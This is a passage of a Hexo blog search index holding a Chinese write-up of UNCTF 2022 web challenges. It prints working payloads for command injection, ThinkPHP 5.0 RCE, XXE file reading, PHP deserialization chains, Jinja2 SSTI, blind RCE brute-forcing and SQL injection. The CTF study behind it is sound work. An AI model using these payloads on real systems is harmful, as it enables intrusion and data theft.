-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsearch.xml
1321 lines (1207 loc) · 547 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>网安笔记小结</title>
<url>/2023/07/---CTF%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93---/</url>
<content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
<script id="hbeData" type="hbeData" data-hmacdigest="a7208dda3f38f69eba26113e82011e6878956be913a5315bceaa05aacda076f3"></script>
<div class="hbe hbe-content">
<div class="hbe hbe-input hbe-input-default">
<input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
<label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
<span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
</label>
</div>
</div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<categories>
<category>资源</category>
</categories>
</entry>
<entry>
<title>2022 unctf wp</title>
<url>/2023/07/2022unctf%20wp/</url>
<content><![CDATA[<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="我太喜欢-bilibili-大学啦–中北大学"><a href="#我太喜欢-bilibili-大学啦–中北大学" class="headerlink" title="我太喜欢 bilibili 大学啦–中北大学"></a>我太喜欢 bilibili 大学啦–中北大学</h3><p>打开就一个 phpinfo<br>直接搜 flag 直出</p>
<blockquote>
<p>虽然我是中北大学的,但这不是我们实验室出的题<br>略感离谱</p>
</blockquote>
<h3 id="签到-吉林警察学院"><a href="#签到-吉林警察学院" class="headerlink" title="签到-吉林警察学院"></a>签到-吉林警察学院</h3><p>打开有行注释<br>以为拿来当用户名密码登录就完了来<br>结果只有个登录成功<br>假签到题<br>尝试使用其他用户名(规律:用户名=密码)<br>发现学号改一下会出现字符<br>再试试还有<br>开始爆破<br>burp 先设置最后一位为变量从 1 爆到 9<br>然后再设置两位为变量从 10 开始往后爆<br>最后手打的 flag<br>懒得写脚本了(为了个签到题写脚本不太划算)</p>
<h3 id="easy-upload-云南警官学院"><a href="#easy-upload-云南警官学院" class="headerlink" title="easy_upload-云南警官学院"></a>easy_upload-云南警官学院</h3><p>传个一句话 mua 写的图片 🐎<br>进去发现不行<br>试了半天<br>把 ContentType 改成 png<br>传进去了<br>然后 🐜🗡 连一下<br>找 flag<br>在/home/ctf/flag</p>
<h3 id="302-与深大-深圳大学"><a href="#302-与深大-深圳大学" class="headerlink" title="302 与深大-深圳大学"></a>302 与深大-深圳大学</h3><p>进去提示 302 重定向<br>burp 抓包<br>然后让 get 和 post 传参进去<br>最后改<code>cookie: admin=true</code><br>flag get√</p>
<h3 id="我太喜欢-bilibili-大学啦修复版-中北大学"><a href="#我太喜欢-bilibili-大学啦修复版-中北大学" class="headerlink" title="我太喜欢 bilibili 大学啦修复版-中北大学"></a>我太喜欢 bilibili 大学啦修复版-中北大学</h3><p>打开又是 phpinfo<br>看题目描述找 hint<br>于是搜索 hint<br>发现指向 admin_unctf.php<br>看源码发现注释</p>
<p><img src= "/img/f022e3b2ba594d11a8788b28d647e89b-1689254291068-205.png" alt="在这里插入图片描述"><br>再抓包,发现 hint2<br>get 用户名密码 unctf2022<br>审源码<br>注入点为 cookie 的 rce<br><code>cmd=127.0.0.1|cat /flag</code><br><img src= "/img/c56f238952a449e09ee455c2a5c36ee2-1689254293564-208.png" alt="在这里插入图片描述"><br>得到个网址<br>指向 B 站用户界面,flag 出现在个签里</p>
<h3 id="babyphp-中国人民公安大学"><a href="#babyphp-中国人民公安大学" class="headerlink" title="babyphp-中国人民公安大学"></a>babyphp-中国人民公安大学</h3><p><img src= "/img/889ebd74b3a446889c7c782732b3d014-1689254295621-211.png" alt="在这里插入图片描述"><br>先是弱类型 0e1 直接过<br>的二个弱类型比较 sha1 值<br>拿出收集的 sha1 值为 0exxxx 的字符组个 payload post 上去:<br><code>a=0e1&key1=aaroZmOk&key2=aaK1STfY</code><br>当然用数组绕过也可以<br><code>a=0e1&key1[1]=1&key2[1]=2</code><br>发现回显有手就行<br>说明到最后一步了找了半天姿势<br>print env 出了<br><code>?code=print_r(exec("env"));</code></p>
<h3 id="ezgame-浙江师范大学"><a href="#ezgame-浙江师范大学" class="headerlink" title="ezgame-浙江师范大学"></a>ezgame-浙江师范大学</h3><p>进入游戏发现 999 滴血比 10 滴血<br>于是直接定位血量,搜索 10 和 999<br>发现 10 有一对 110 干扰,不好定位<br>于是从 999 下手<br>把 mainjs 放到本地<br>把代码缩起来方便看<br>发现 999(5149 行)在 120 里面定义<br>往前找 new 的 r 发现定位到 146(5104)</p>
<p><img src= "/img/c74f444604ae4fe8a7acdb0fda5814b0-1689254298285-214.png" alt="在这里插入图片描述"><br>去看 146<br>发现个 life 和 maxlife<br>选择 maxlife 下手<br>先下个断点<br><img src= "/img/14c1f5e2231a4a94842e6dfacb554121-1689254300169-217.png" alt="在这里插入图片描述"><br>运行后调用来生成各个属性,一开始给的是 10 即自己的血量<br>再继续运行直到 t=999<br>再修改右侧作用域里的 t 为 0<br>继续运行 flag 弹出<br><img src= "/img/a9fd35417ddc4086b8780cc0e0c359a2-1689254301778-220.png" alt="在这里插入图片描述"></p>
<h3 id="给你一刀-西南科技大学"><a href="#给你一刀-西南科技大学" class="headerlink" title="给你一刀-西南科技大学"></a>给你一刀-西南科技大学</h3><p>放个 tp5.0 的页面在主页<br>指向性太明显了<br>直接搜 tp5.0 漏洞<br>当然以 rce 为主<br>只看了前几个网址<br>共有两种 payload<br>试了之后有一种成功<br><code>?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=env</code></p>
<h3 id="听说-php-有一个-xxe-西南科技大学"><a href="#听说-php-有一个-xxe-西南科技大学" class="headerlink" title="听说 php 有一个 xxe-西南科技大学"></a>听说 php 有一个 xxe-西南科技大学</h3><p>拿出 xxe 最简单的 payload(做 buuctf 某 xxe 题时 payload 留的)<br>用 raw 格式发包</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"UTF-8"</span>?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">root</span>[</span></span><br><span class="line"><span class="meta"><span class="meta"><!ENTITY <span class="keyword">flag</span> <span class="keyword">SYSTEM</span> <span class="string">"file:///flag"</span>></span></span></span><br><span class="line"><span class="meta">]></span></span><br><span class="line"><span class="tag"><<span class="name">root</span>></span></span><br><span class="line"><span class="tag"><<span class="name">username</span>></span><span class="symbol">&flag;</span><span class="tag"></<span class="name">username</span>></span></span><br><span class="line"><span class="tag"><<span class="name">password</span>></span>2333<span class="tag"></<span class="name">password</span>></span></span><br><span class="line"><span class="tag"></<span class="name">root</span>></span></span><br></pre></td></tr></table></figure>
<p><img src= "/img/143da1796e334dbd95a07e96082c52fd-1689254304521-223.png" alt="在这里插入图片描述"></p>
<h3 id="快乐三消-河南理工大学"><a href="#快乐三消-河南理工大学" class="headerlink" title="快乐三消-河南理工大学"></a>快乐三消-河南理工大学</h3><p>做 ctfshow 的黑盒题做多了这种题就好说了<br>先扫目录扫到 admin 和.git<br>githack 直接 down 下来<br>发现没多少东西<br>转去看 admin<br>也没注释啥的<br>开始猜密码<br>没猜到<br>放了一段时间回来看想到 admin 目录下还可能有备份泄露<br>之前光跑的主目录下的<br>跑 admin 下发现个 login.php.bak<br>有注释 admin/unctf<br>进入后台<br><img src= "/img/7dc621151ff14881b0cb946299cc1d6a-1689254306895-226.png" alt="在这里插入图片描述"></p>
<p>本来又想 upload 的时候<br>直觉告诉我应该不是<br>转去看源码<br>发现 fi.php?filename=index.php</p>
<blockquote>
<p>到这里后发现刚才扫目录的时候也扫到 fi 了<br>但是当时不知到咋用<br>fi 应该是 file 吧<br>学会了,下会遇见就接<code>?filename=</code></p>
</blockquote>
<p>定位到那个按钮发现是个网站套网站,应该能读 flag<br><code>/admin/fi.php?filename=/flag</code><br>读到<br>题本身不难<br>但是误导性太强了<br>出题师傅 tql</p>
<h3 id="ezunseri-西华大学"><a href="#ezunseri-西华大学" class="headerlink" title="ezunseri-西华大学"></a>ezunseri-西华大学</h3><p>destruct->get->toString->invoke->绕过 wakeup</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Exec</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$content</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">execute</span>(<span class="params"><span class="variable">$var</span></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">eval</span>(<span class="variable language_">$this</span>->content);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="variable language_">$this</span>->content;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="variable">$content</span> = <span class="variable language_">$this</span>-><span class="title function_ invoke__">execute</span>(<span class="variable">$this</span>->content);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="variable language_">$this</span>->content = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"1!5!"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$test</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->test = <span class="keyword">new</span> <span class="title class_">Exec</span>();</span><br><span class="line"> <span class="variable language_">$this</span>->test->content = <span class="string">"system('cat /fl*');"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="variable">$name</span> = <span class="variable language_">$this</span>->test;</span><br><span class="line"> <span class="variable">$name</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Login</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$code</span> = <span class="string">'3.1415926'</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable language_">$this</span>->code = <span class="string">'3.1415926'</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>->key->name;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title class_">Login</span>();</span><br><span class="line"><span class="variable">$a</span>->key = <span class="keyword">new</span> <span class="title class_">Exec</span>();</span><br><span class="line"><span class="variable">$a</span>->key->content = <span class="keyword">new</span> <span class="title class_">Test</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>),<span class="string">"\n"</span>;</span><br></pre></td></tr></table></figure>
<p>得到<br><code>O:5:"Login":3:{s:4:"name";N;s:4:"code";s:9:"3.1415926";s:3:"key";O:4:"Exec":1:{s:7:"content";O:4:"Test":2:{s:4:"test";O:4:"Exec":1:{s:7:"content";s:19:"system('cat /fl*');";}s:3:"key";N;}}}</code><br>将 Exec 的成员数改为 2(两个任意一个即可)<br>绕过 wakeup<br><code>O:5:"Login":3:{s:4:"name";N;s:4:"code";s:9:"3.1415926";s:3:"key";O:4:"Exec":1:{s:7:"content";O:4:"Test":2:{s:4:"test";O:4:"Exec":2:{s:7:"content";s:19:"system('cat /fl*');";}s:3:"key";N;}}}</code></p>
<h3 id="poppop-中国人民公安大学"><a href="#poppop-中国人民公安大学" class="headerlink" title="poppop-中国人民公安大学"></a>poppop-中国人民公安大学</h3><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$code</span> = <span class="string">"phpinfo();"</span>;</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$method</span>, <span class="variable">$args</span></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">eval</span>(<span class="variable language_">$this</span>->code);</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="variable language_">$this</span>->code = <span class="string">""</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">B</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$key</span>;</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable language_">$this</span>->key;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">C</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$key2</span>;</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>->key2 = <span class="keyword">new</span> <span class="title function_ invoke__">A</span>();</span><br><span class="line"> }</span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="variable language_">$this</span>->key2-><span class="title function_ invoke__">abab</span>(<span class="number">1</span>,<span class="number">1</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$b</span> = <span class="keyword">new</span> <span class="title function_ invoke__">B</span>();</span><br><span class="line"><span class="variable">$b</span>->key = <span class="keyword">new</span> <span class="title function_ invoke__">C</span>();</span><br><span class="line"><span class="comment">//$b->key->key2 = new A();</span></span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$b</span>)), <span class="string">"\n"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$b</span>), <span class="string">"\n"</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="babynode-云南大学"><a href="#babynode-云南大学" class="headerlink" title="babynode-云南大学"></a>babynode-云南大学</h3><p>看题目描述<br>原型链污染<br>直接套</p>
<blockquote>
<p>ps:感觉见过类似的题好像是 ctfshow?</p>
</blockquote>
<p>json 格式传</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">{<span class="string">"__proto__"</span>:{<span class="string">"id"</span>:<span class="string">"unctf"</span>}}</span><br></pre></td></tr></table></figure>
<p><img src= "/img/36c51123eb204808b36a03f5bc284255-1689254311795-229.png" alt="在这里插入图片描述"></p>
<h3 id="easy-ssti-金陵科技学院"><a href="#easy-ssti-金陵科技学院" class="headerlink" title="easy ssti-金陵科技学院"></a>easy ssti-金陵科技学院</h3><p>jinjia2<br>ssti 常用 payload 随便上一个<br>过滤 class<br>各种操作掩护一下 class<br>都不行<br>class 查的很严啊<br>别骂了别骂了<br><img src= "/img/eb71256a4e5a4552ac2cf3cb8db1b470-1689254313611-232.png" alt="在这里插入图片描述"></p>
<p>换方法:<br><code>{{x.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()")}}</code><br>成功输出<br>改下 payload 读 flag.txt<br><del>NM</del><br><img src= "/img/ff64b104d05f4653931010c509c859ed-1689254316387-235.png" alt="在这里插入图片描述"><br>给你点祝福了你还骗我<br>nnd<br>想到这个比赛藏 flag 基本都在 env 里<br><del>有无代打出题人服务</del><br>读 env<br>成功<br><img src= "/img/71a2f0f0d5834ec59d7d1e147c1edaa8-1689254317912-238.png" alt="在这里插入图片描述"></p>
<h3 id="easy-rce-西南科技大学"><a href="#easy-rce-西南科技大学" class="headerlink" title="easy_rce-西南科技大学"></a>easy_rce-西南科技大学</h3><p>提示 rce 的布尔盲注<br>发现<code>><</code>被过滤 不乐<br>写脚本直接爆</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">charlist = <span class="string">'abcdefghijklmnopqrstuvwxyz01234567890_-'</span></span><br><span class="line">result = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>, <span class="number">50</span>):</span><br><span class="line"> <span class="keyword">for</span> char <span class="keyword">in</span> charlist:</span><br><span class="line"> url = <span class="string">"http://4a423fce-e3cf-4d13-9f02-f28cb11fa8ba.node.yuzhian.com.cn/index.php?code=test $(echo $(tac /?lag)|cut -c {0}) == {1}||1"</span>.<span class="built_in">format</span>(</span><br><span class="line"> i, char)</span><br><span class="line"> <span class="comment"># print(url)</span></span><br><span class="line"> back = requests.get(url=url)</span><br><span class="line"> <span class="comment"># print(back.text)</span></span><br><span class="line"> <span class="keyword">if</span> <span class="string">"success"</span> <span class="keyword">in</span> back.text:</span><br><span class="line"> result = result + char</span><br><span class="line"> <span class="built_in">print</span>(i, back.text)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="keyword">if</span> <span class="string">"fail"</span> <span class="keyword">in</span> back.text:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'UNCTF{'</span> + result + <span class="string">'}'</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="EZ-2048"><a href="#EZ-2048" class="headerlink" title="EZ-2048"></a>EZ-2048</h3><p>按下 f12<br>发现程序监听等候在 game.js<br>然后想到输入邀请码错误后返回 error<br>在 game.js 搜索 error<br><img src= "/img/545bbca2475a42b3b72959d1464860cf-1689254326354-247.png" alt="在这里插入图片描述"><br>然后一直往上查到 checkInvited()<br>仔细阅读后发现<br>加密方式在这里<br>分奇偶数进行两种异或<br><img src= "/img/f6db654f9fd24e0a8f9d7177218d09cd-1689254324923-244.png" alt="在这里插入图片描述"><br>由于环境中 f12 自动卡在 debuger<br>所以只能 down 到本地运行<br><img src= "/img/7cf6aebbd3aa48cfbd58f89380aae553-1689254321982-241.png" alt="在这里插入图片描述"><br>本地起了个环境<br>删掉 game.js 的第一行<br>使得可以本地调试<br>由于需要得到这几组数据<br><img src= "/img/868021b559614f9bb45683b3b8f839bb-1689254335939-250.png" alt="在这里插入图片描述"><br>需要转成正常 10 进制<br>尝试打个断点<br>看下数据<br>可以在 debug 中<br><img src= "/img/77a856ed81444f239edbbd7e8ca93092-1689254337582-253.png" alt="在这里插入图片描述"><br>点击 buf 后面的跳转到内存检查器<br>16 转 10 后得到正常数据<br><img src= "/img/1ba2094dffba4102996b6b4886d139f8-1689254339471-256.png" alt="在这里插入图片描述"><br>写脚本逆回去<br>由于偶数列与 invite 的 i+1 相关即 invite 的奇数项<br>所以需要先将 invite 的奇数项全部生成<br>先把奇数项逆回去</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">view = [</span><br><span class="line"> <span class="number">68</span>, <span class="number">51</span>, <span class="number">15</span>, <span class="number">80</span>, <span class="number">93</span>, <span class="number">14</span>, <span class="number">58</span>, <span class="number">50</span>, <span class="number">88</span>, <span class="number">48</span>, <span class="number">42</span>, <span class="number">26</span>, <span class="number">13</span>, <span class="number">22</span>, <span class="number">18</span>, <span class="number">5</span>, <span class="number">2</span>, <span class="number">86</span>, <span class="number">0</span>, <span class="number">2</span>,</span><br><span class="line"> <span class="number">0</span>, <span class="number">19</span>, <span class="number">0</span>, <span class="number">0</span></span><br><span class="line">]</span><br><span class="line">inv = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">24</span>, <span class="number">2</span>): <span class="comment"># 先逆奇数项</span></span><br><span class="line"> other = view[i - <span class="number">2</span>] <span class="keyword">if</span> i - <span class="number">2</span> >= <span class="number">0</span> <span class="keyword">else</span> <span class="number">0</span></span><br><span class="line"> view[i] ^= other</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">24</span>, <span class="number">2</span>): <span class="comment"># 再逆偶数项</span></span><br><span class="line"> other = view[i + <span class="number">1</span>] <span class="keyword">if</span> i + <span class="number">1</span> <= <span class="number">23</span> <span class="keyword">else</span> <span class="number">0</span></span><br><span class="line"> view[i] ^= other</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">24</span>):</span><br><span class="line"> inv += <span class="built_in">chr</span>(view[i])</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(inv)</span><br><span class="line"><span class="comment">## w3lc0me_7o_unctf2022!!!!</span></span><br></pre></td></tr></table></figure>
<p>然后将本地的 game.js 中 addRandomTile()<br>生成的随机方块改为固定的<br>即将 223 行改为<br><code>const value = 1024;</code><br>通关条件检测的是 1024 碰撞生成 2018 的过程<br>此处若改为 2048<br>则无该过程<br>所以最快只能改为 1024</p>
<blockquote>
<p>我感觉该题貌似也可以通过逆向 wasm 来直接获取 flag<br>不过那估计就不是 web 题了 乐<br>本来这题就是个密码学题 不乐</p>
</blockquote>
<p><img src= "/img/33495e06082f49a2ad47f3007402d69b-1689254341777-259.png" alt="在这里插入图片描述"></p>
<h3 id="随便注-云南警官学院"><a href="#随便注-云南警官学院" class="headerlink" title="随便注-云南警官学院"></a>随便注-云南警官学院</h3><p>过滤了 or and select use(是 use 不是 user?怪哦)双写可绕过<br>尝试了几下没啥手感<br>转去偷懒用 sqlmap<br>先是读库,表,行都正常<br>记得有个 haha 表 笑话我是吧<br>然后还有个 ctftranning -> FLAG_TABLE -> FLAG_COLUMN 读的时候没回显貌似是空的<br>但是读 ctftranning 里的 news 里面说就在这个库里,但不在这<br>人傻了<br>在那个库里疯狂找<br>甚至怀疑 FLAG_COLUMN 里的读不到是有过滤导致的<br>还在那想咋绕过啥的<br>最后死活出不来<br>于是去尝试 sql 注入的文件操作<br>sqlmap <code>--os-shell</code>没成功?<br>但是<code>--file-read "/flag"</code>成功带回</p>
<h3 id="Sqlsql-中国人民公安大学"><a href="#Sqlsql-中国人民公安大学" class="headerlink" title="Sqlsql-中国人民公安大学"></a>Sqlsql-中国人民公安大学</h3><p>审源码发现<br>多处都有 addslashes_deep 过滤<br>有想到时 addslash 旧版本有绕过<br>跟进之后发现该函数过滤挺严格的<br>于是放弃该方法<br>转向逻辑性漏洞<br>最后发现 index.php 里<br><img src= "https://img-blog.csdnimg.cn/636d3201710f4936b161de363b53c5c4.png" alt="在这里插入图片描述"><br>qxxx 都没有经过 addslashes_deep 过滤直接 insert 进去了<br>尝试从这里注进去<br>由于本体的重点应该是使用 admin 用户去查询<br>所以考虑能 insert 一个 admin 用户的方法<br>不需要查数据所以也就不需要回显<br><code>');insert into users values (NULL,'admin','2105044235');#</code><br>在 index.php 的做题界面随便选<br>burp 截包将上面 payload 加在 post 的答案后面重发<br>然后登出<br>用 admin 登录<br><img src= "/img/85e3f5fd661f44cf81edda69c26126ce-1689254344389-262.png" alt="在这里插入图片描述"></p>
<p>查询成绩<br><img src= "/img/e2aaf17890c44f2587b36ea065e110e8-1689254345707-265.png" alt="在这里插入图片描述"></p>
<p>这里查询任何一位存在的用户都可以 get flag</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="welcomeUNCTF2022-云南警官学院"><a href="#welcomeUNCTF2022-云南警官学院" class="headerlink" title="welcomeUNCTF2022-云南警官学院"></a>welcomeUNCTF2022-云南警官学院</h3><p><img src= "/img/e553ec18f9c84deeb0dc32119ac15c33-1689254347996-268.png" alt="在这里插入图片描述"></p>
